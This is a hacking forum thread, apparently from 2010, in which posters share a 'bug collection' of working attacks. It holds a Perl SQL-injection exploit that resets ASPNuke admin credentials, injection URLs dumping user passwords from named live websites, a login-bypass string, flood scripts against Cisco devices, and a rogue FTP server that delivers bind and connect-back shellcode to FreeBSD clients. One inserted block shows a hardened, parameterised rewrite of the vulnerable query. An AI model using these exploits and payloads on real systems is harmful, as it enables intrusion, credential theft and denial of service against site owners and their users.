Bug Collection

Forum for discussing everything about web hacking, from footprinting, scanning, gaining access, privilege escalation, exploits, covering tracks and backdoors through to securing websites

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Discuss bugs, penetration, exploitation and techniques for securing websites and web servers. Include a PoC here so members can learn from it.
Digital Cat
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA

Re: Bug Collection

Post by Digital Cat » Fri Jan 15, 2010 12:20 pm

Exploit for ASPNuke and ASP Portal

Code:

#!/usr/bin/perl
######################################################################################
#       			                            Organization Of Cat
######################################################################################
# Exploit for ASPNuke and ASP Portal
#
# Exploit By: [email protected]
#
######################################################################################
#  Thanks to ==>  Alpha_programmer , Crouz Security Team , Hat-squad security team
######################################################################################
use IO::Socket;

if (@ARGV < 1)
{
 print "\n==========================================\n";
 print " \n     -- Digital Cat --\n\n";
 print "     Organization Of Cat      \n\n";
 print "     cara gunakan:ASPNuke.pl <Victim> \n\n";
 print "==========================================\n\n";
 print "Contoh:\n\n";
 print "   ASPNuke.pl www.victim.com \n";
 exit();
}

my $host = $ARGV[0];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );

unless ($remote) { die "koneksi terputus ke $host" }

print "[+]Terhubung\n";

$addr = "GET /module/article/article/article.asp?articleid=1%20;%20update%20tbluser%20SET%20password='bf16c7ec063e8f1b62bf4ca831485ba0da56328f818763ed34c72ca96533802c'%20,%20username='trapset'%20where%20userID=1%20-- HTTP/1.0\n";
$addr .= "Host: $host\n\n\n\n";
print "\n";
print $remote $addr;
print "[+]Sedang diproses...";
sleep(5);
print "melakukan proses pergantian password ...\n";

print "[+]OK , Sekarang mau loginnya dengan apa,silahkan konfirmasi : \n";
print "Username: trapset\n";
print "Password: trapset\n\n";
Okey…

Re: Bug Collection

Post by Digital Cat » Fri Jan 15, 2010 12:31 pm

Multiple SQL Injection Vulnerability

Injection in:
  • projects.php
  • contacts.php
  • users.php
  • types_authors.php
  • bibliographies.php
  • types_projects.php
  • types_languages.php
  • types_countries.php
Code:

UNION SELECT @@version%23
Demo :

Vulnerable function:

function get_vatitle($idregister,$idregistervalue,$nameregister,$tableregister,$pretitle) {
 $vartitle = "SELECT $nameregister FROM $tableregister WHERE ($idregister=$idregistervalue)";
 $vartitle = mysql_query($vartitle) or die("error functions_queries line 4");
 $vartitle = mysql_fetch_array($vartitle);
 extract($vartitle);
 $title = $pretitle." &raquo; ".$$nameregister;
 return $title;
}
Key….
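
A hardened form of the lookup in the vulnerable function above, as an added example that is not part of the original post or of the affected application: identifiers are taken from an allowlist, and the id is validated and bound as a parameter. The `get_title` name, the table and column names and the in-memory SQLite database are assumptions for illustration.

```php
<?php
// Added example: hardened rewrite of the get_vatitle() lookup.
// Table and column names are hypothetical; SQLite stands in for the real DB.

// Identifiers cannot be bound as parameters, so they come from a fixed
// allowlist: table => id column and the columns that may be read.
const TITLE_SOURCES = [
    'projects' => ['id' => 'idproject', 'cols' => ['title']],
    'contacts' => ['id' => 'idcontact', 'cols' => ['name']],
];

function get_title(PDO $db, string $table, string $column, $id, string $pretitle): ?string
{
    if (!array_key_exists($table, TITLE_SOURCES)
        || !in_array($column, TITLE_SOURCES[$table]['cols'], true)) {
        throw new InvalidArgumentException('unknown table or column');
    }
    // Accept only a plain non-negative integer as the record id.
    $id = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    if ($id === false) {
        throw new InvalidArgumentException('id must be an integer');
    }
    $idCol = TITLE_SOURCES[$table]['id'];
    // Identifiers are allowlisted; the value is bound, never concatenated.
    $stmt = $db->prepare("SELECT $column FROM $table WHERE $idCol = :id");
    $stmt->execute([':id' => $id]);
    // Read one column directly: no extract(), so a row cannot overwrite locals.
    $value = $stmt->fetchColumn();
    if ($value === false) {
        return null;
    }
    // Assumption: the title is placed into HTML, so encode the stored value.
    return $pretitle . ' &raquo; ' . htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8');
}

// Constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE projects (idproject INTEGER PRIMARY KEY, title TEXT)");
$db->exec("INSERT INTO projects VALUES (1, 'Atlas <beta>')");

echo get_title($db, 'projects', 'title', '1', 'Projects'), "\n";
try {
    // The payload form quoted in the post is refused before any SQL is built.
    get_title($db, 'projects', 'title', '1 UNION SELECT @@version#', 'Projects');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```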

Re: Bug Collection

Post by Digital Cat » Fri Jan 15, 2010 12:34 pm

Powered by BKWorks ProPHP Version 0.50 Beta 1

Login as :

Code:

Username : admin ' or ' 1=1

Password : anything or nothing
And you will be logged in.

Live Demo Key…

Re: Bug Collection

Post by Digital Cat » Sat Jan 16, 2010 11:01 am

Bugs Online v2.14 SQL Injection

Download :
http://sourceforge.net/project/showfile ... p_id=42528

Bug :

Code:

http://[site]/help.asp?stype=-999'%20union%20select%200,suser_name,spassword%20from%20tblusers%20where%20'1
Key…

Re: Bug Collection

Post by Digital Cat » Sat Jan 16, 2010 11:03 am

noticias.php

Victim :
www.caindependiente.com

Link :
www.caindependiente.com/cms/noticias.php

Code:

union+all+select+0,1,2,3,concat%28usuario,0x3a3a,pass%29,5,6,7,8,9+from+usuarios—
Demo:
http://www.caindependiente.com/cms/noticias.php?id=-1+union+all+select+0,1,2,3,concat%28usuario,0x3a3a,pass%29,5,6,7,8,9+from+usuarios--

Login :
http://www.caindependiente.com/cms/login.php

key…

Re: Bug Collection

Post by Digital Cat » Sat Jan 16, 2010 11:04 am

Apache 2.2.11 Shutdown/PHP 5.2.8 Buffer Overflow

Target :
  • com_print_typeinfo
Greetz :
  • shinnai
Code:

<?php
$FTW = str_repeat("A",1992);
com_print_typeinfo($FTW); 
echo "Digital Cat.";
?>
Key…

Re: Bug Collection

Post by Digital Cat » Sat Jan 16, 2010 11:06 am

Flood Cisco CSS types 11000, 11050, 11150, 11800

Programming language: Perl

Code:

#!/usr/bin/perl
use Net::RawIP;
$s_addr = $ARGV[0];
$vic = $ARGV[1];
print "\Digital Cat ([email protected])\n";
if(!$ARGV[1]){
	die "Cara pengunaan: perl $0 <source address> <victim>\n";
}
@ports =(1..1024);
sub packet{
	print "My Cat now commencing with packetting..\n";
	$port= shift(@ports);
	$p = new Net::RawIP;
	$p->set({ip => {saddr => $s_addr,daddr => $vic},
		    tcp => {source => 31337,dest => $port,psh => 1, syn => 1}});
	$p->send(0.05,150);
}
for($i=0;$i<10;$i++){
	packet;
}
Key…

Re: Bug Collection

Post by Digital Cat » Sat Jan 16, 2010 11:07 am

Flood Cisco Type 677

Programming language :
Perl

Target Port :
23

Service :
Telnet Server

Code:

#!/usr/bin/perl
use IO::Socket;
use Getopt::Std;
getopts('s:', \%args);
if(!defined($args{s})){&usage; }
$serv = $args{s};
$foo = "?????????????????a~                %%%%%XX%%%%%"; $number = 30000;
$data .= $foo x $number; $EOL="\015\012";
$remote = IO::Socket::INET->new(
Proto       => "tcp",
PeerAddr    => $args{s},
PeerPort    => "(23)",
) || die("Service Telnet tidak ditemukan! on $args{s}\n");
$remote->autoflush(1);
print $remote "$data". $EOL;
while (<$remote>){ print }
print("\nMengirim Packets\n");
sub usage {die("\n$0 -s <server>\n\n");}
Key…

Re: Bug Collection

Post by Digital Cat » Sat Jan 16, 2010 11:08 am

PoC exploit FreeBSD

Target :
  • IglooFTP (FreeBSD 4.7)
  • cftp (FreeBSD 4.7)
  • Moxftp (FreeBSD 4.7)
  • cftp (FreeBSD 5.0)
  • IglooFTP (FreeBSD 5.0)
  • Moxftp (FreeBSD 5.0)
Code:

#!/usr/bin/perl

use IO::Socket;

sub convert_ret {
my($ret) = @_;
    
    for ($x=8; $x>0; $x=$x-2){
	$ret = substr($ret_temp,$x,2);
	$new_ret .= chr hex "$ret";
    }
return $new_ret;
}

sub convert_ip {
my($ip) = @_;

@ip_tmp = split(/\./, $ip);

for($x=0; $x<4; $x++) {
    $new_ip .= chr @ip_tmp[$x];
}
return $new_ip;
}

$server_port = 21;
$passive_server_port = 10324;

unless(@ARGV == 3 || @ARGV == 2) 
{ die 
"Penggunaan ./DSR-ftp_clients.pl Shellcode Client Ip\n
\tShellcode:\t0 = Portbind
\t\t\t1 = Connect back\n
\tClient:\t\t0 = IglooFTP (FreeBSD 4.7)
\t\t\t1 = cftp (FreeBSD 4.7)
\t\t\t2 = Moxftp (FreeBSD 4.7)
\t\t\t3 = cftp (FreeBSD 5.0)
\t\t\t4 = IglooFTP (FreeBSD 5.0)
\t\t\t5 = Moxftp (FreeBSD 5.0)\n"
}

($shellcode_arg, $client_arg, $extra_arg) = @ARGV;

$user_ip = convert_ip($extra_arg);

@shellcode_list = (
    "Portbind,\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x52\x66\x68\x27\x10\x66\x51\x89\xe6\xb1\x10\x51\x56\x50\x50\xb0\x68\xcd\x80\x51\x53\x53\xb0\x6a\xcd\x80\x52\x52\x53\x53\xb0\x1e\xcd\x80\xb1\x03\x89\xc3\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80",
    "Connect Back,\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x68"."$user_ip"."\x66\x68\x27\x10\x66\x51\x89\xe6\xb2\x10\x52\x56\x50\x50\xb0\x62\xcd\x80\x41\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80");

@client_list = (
    "IglooFTP - FreeBSD 4.7,188,0xbfbfc560,0",
    "cftp - FreeBSD 4.7,8192,0xbfbffb04,1,300",
    "mftp - FreeBSD 4.7,516,0xbfbff8e0,1,100",
    "cftp - FreeBSD 5.0,8196,0xbfbffa30,1,300",
    "IglooFTP - FreeBSD 5.0,212,0xbfbfc440,0",
    "mftp - FreeBSD 5.0,532,0xbfbff950,1,100");

@client_info = split(/,/,@client_list[$client_arg]);
@shellcode_info = split(/,/,@shellcode_list[$shellcode_arg]);

print "\tDSR-ftp_clients by Digital Cat\n
Setting up Service on Port: $server_port
Client: @client_info[0]
Using Shellcode: @shellcode_info[0]
Using Offset: @client_info[2]\n";

$shellcode = @shellcode_info[1];
$shellcode_length = length($shellcode);

$nop_count = @client_info[1] - $shellcode_length - 8;
$nops = "\x90"x$nop_count;

$ret_temp = @client_info[2];
$ret = substr($ret_temp,2,8);
$ret = convert_ret($ret);
$ret = "$ret"x2;

if(@client_info[3] eq "1") {
    $nops_x = "\x90"x@client_info[1];
    $nops_y = "\x90"x@client_info[4];
    $exploit_string = "$nops_x"."$ret"."$nops_y"."$shellcode";
}

if($client_arg == 0 or $client_arg == 4) {
	$exploit_string ="total 666
drwxr-xr-x	25 root wheel	1536 Jan 28 00:13 .
drwxr-xr-x	14 root wheel	 512 Jan 28 00:13 ..
-rwxr-xr-x	 2 digital_cat	digital_cat	 512 Jan 29 01:00 $nops$shellcode$ret";
}

$server = IO::Socket::INET->new(LocalPort => $server_port,
                                Type    => SOCK_STREAM,
                                Reuse   => 1,
                                Listen  => 10)
or die "My Cat Can't listen on $server_port : $!\n";

while ($client = $server->accept()) {
    
    if(@client_info[3] == 1) {
	print $client "220 $exploit_string\n";
    }
    
    if(@client_info[3] eq "0") {
	print $client "220 0xdeadcode\n";
	while($request !=~ /QUIT/i) {
	    $request = <$client>;
	    print $request;
	    
	    if($request =~ /PASS/i) {
		print $client "230 User anonymous My Cat logged in.\n";
	    }
	    
	    if($request =~ /USER/i) {
		print $client "331 Anonymous Password required for My Cat.\n";
	    }
	
	    if($request =~ /SYST/i) {
		print $client "215 UNIX Type: L8\n";
	    }
	
	    if($request =~ /REST/i) {
		print $client "350 My Cat Restarting.\n";
	    }
	
	    if($request =~ /TYPE/i) {
		    print $client "200 My Cat Type set to A.\n";
	    }
	    
	    if($request =~ /PWD/i or $request =~ /FEAT/i) {
		print $client "257 \"/usr/home/digital_cat/\" is current directory.\n";
	    }
	
	    if($request =~ /PASV/i) {
		$passive_server = IO::Socket::INET->new(LocalPort => $passive_server_port,
					Type 	=> SOCK_STREAM,
					Reuse 	=> 1,
					Listen 	=> 10)
		or die "My Cat Can't open passive port";
		print $client "227 My Cat Entering Passive Mode (127,0,0,1,40,84)\n";
	    }
	    
	    if ($request =~ /LIST/i) {
		while($passive_client = $passive_server->accept()){
		    print $client "150 My Cat Starting transfer.\n";    
		    print $passive_client $exploit_string;
		    close $passive_client;
		    print $client "226 BANG My Cat DEAD!!!\n";
		}
	    }		
	}
    close $client;
    }
}

Muhammad_ibl
Posts: 12
Joined: Fri Apr 25, 2008 4:54 pm

Re: Bug Collection

Post by Muhammad_ibl » Sat Jan 30, 2010 7:03 am

Here are a few SQL injection bugs. Hopefully they can serve as reference material.

Code:

http://www.santika.com/news.php?id=-37%20union%20select%201,2,3,group_concat%28table_name%29

%20from%20information_schema.tables%20where%20table_schema=database%28%29--

Code:

http://www.santika.com/news.php?id=-37%20union%20select%201,2,3,group_concat%28column_name%2

9%20from%20information_schema.columns%20where%20table_name=0x6d656d62657273686970--

Code:

http://www.skw.co.id/news.php?id=-91%20union%20select%201,group_concat%28table_name%29,3,4,5

%20from%20information_schema.tables%20where%20table_schema=database%28%29--

Code:

http://www.milim.com/news.php?id=-100%20union%20select%201,group_concat%28bb_username,0x3a,b

b_password%29,3,4,5,6,7,8%20from%20bb_users--

Code:

http://www.milim.com/news.php?id=-100%20union%20select%201,group_concat%28username,0x3a,pass

word%29,3,4,5,6,7,8%20from%20cms_users--
